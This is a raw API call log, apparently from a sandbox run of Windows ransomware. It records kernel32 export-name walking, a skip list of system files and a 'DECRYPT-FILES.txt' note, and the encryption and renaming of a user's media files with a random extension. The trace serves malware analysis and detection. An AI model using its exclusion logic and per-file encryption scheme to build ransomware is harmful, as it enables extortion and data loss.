returned="CreateTimerQueue" [0076.641] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.641] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.641] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.641] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.641] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.641] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.641] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.641] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.641] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.641] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.641] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.641] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.641] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.641] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.642] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.642] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.642] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.642] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.642] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.642] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.642] lstrlenA (lpString="DELETEATOM") returned 10 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.642] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.642] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.642] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.642] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.642] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.642] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.642] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.642] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.642] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.642] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.642] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.642] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.643] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.643] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.643] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.643] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.643] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.643] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.643] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.643] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.643] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.643] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.643] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.643] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.643] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.643] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.643] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.643] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.643] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.644] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.644] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.644] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.644] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.644] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.644] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.644] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.644] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.644] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.644] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.644] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.644] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.644] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.645] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5hXhWeztPrf9ZQC1Z.png") returned 67 [0076.645] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5hXhWeztPrf9ZQC1Z.png.L8QmF") returned 73 [0076.645] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5hXhWeztPrf9ZQC1Z.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5hxhweztprf9zqc1z.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5hXhWeztPrf9ZQC1Z.png.L8QmF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5hxhweztprf9zqc1z.png.l8qmf"), dwFlags=0x0) returned 1 [0076.645] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.646] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.646] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.646] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c774b20, ftCreationTime.dwHighDateTime=0x1d4cbbd, ftLastAccessTime.dwLowDateTime=0x3597d810, ftLastAccessTime.dwHighDateTime=0x1d4cb21, ftLastWriteTime.dwLowDateTime=0x3597d810, ftLastWriteTime.dwHighDateTime=0x1d4cb21, nFileSizeHigh=0x0, nFileSizeLow=0x18573, dwReserved0=0x0, dwReserved1=0x0, cFileName="6pO6mQLU.m4a", cAlternateFileName="")) returned 1 [0076.646] lstrcmpiW (lpString1="6pO6mQLU.m4a", lpString2="DECRYPT-FILES.txt") returned -1 [0076.646] lstrcmpiW (lpString1="6pO6mQLU.m4a", lpString2="autorun.inf") returned -1 [0076.646] lstrcmpiW (lpString1="6pO6mQLU.m4a", lpString2="boot.ini") returned -1 [0076.646] lstrcmpiW (lpString1="6pO6mQLU.m4a", lpString2="desktop.ini") returned -1 [0076.646] lstrcmpiW (lpString1="6pO6mQLU.m4a", lpString2="ntuser.dat") returned -1 [0076.646] lstrcmpiW (lpString1="6pO6mQLU.m4a", lpString2="iconcache.db") returned -1 [0076.646] lstrcmpiW (lpString1="6pO6mQLU.m4a", lpString2="bootsect.bak") returned -1 [0076.646] lstrcmpiW (lpString1="6pO6mQLU.m4a", lpString2="ntuser.dat.log") returned -1 [0076.646] lstrcmpiW (lpString1="6pO6mQLU.m4a", lpString2="thumbs.db") returned -1 [0076.646] lstrcmpiW (lpString1="6pO6mQLU.m4a", lpString2="Bootfont.bin") returned -1 [0076.646] lstrlenW (lpString="6pO6mQLU.m4a") returned 12 [0076.646] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0076.646] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0076.647] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0076.647] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0076.647] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0076.647] lstrlenW (lpString="6pO6mQLU.m4a") returned 12 [0076.647] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0076.647] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="6pO6mQLU.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6pO6mQLU.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6pO6mQLU.m4a" [0076.647] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6pO6mQLU.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6po6mqlu.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0076.647] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=99699) returned 1 [0076.647] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0076.647] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0076.647] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.647] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.647] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.648] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0076.648] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0076.650] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.650] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0076.651] CloseHandle (hObject=0x444) returned 1 [0076.651] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.651] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0076.652] CloseHandle (hObject=0x0) returned 0 [0076.652] CloseHandle (hObject=0x440) returned 1 [0076.653] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.653] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.654] GetTickCount () returned 0x114bac8 [0076.654] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.654] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.654] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.654] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.654] lstrlenA (lpString="kernel32.dll") returned 12 [0076.655] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.655] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.655] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.655] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.655] lstrlenA (lpString="ADDATOMA") returned 8 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.655] lstrlenA (lpString="ADDATOMW") returned 8 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.655] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.655] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.655] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.655] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.655] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.655] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.655] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.655] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.655] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.655] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.656] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.656] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.656] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.656] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.656] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.656] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.656] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.656] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.656] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.656] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.656] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.656] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.656] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.656] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.656] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: 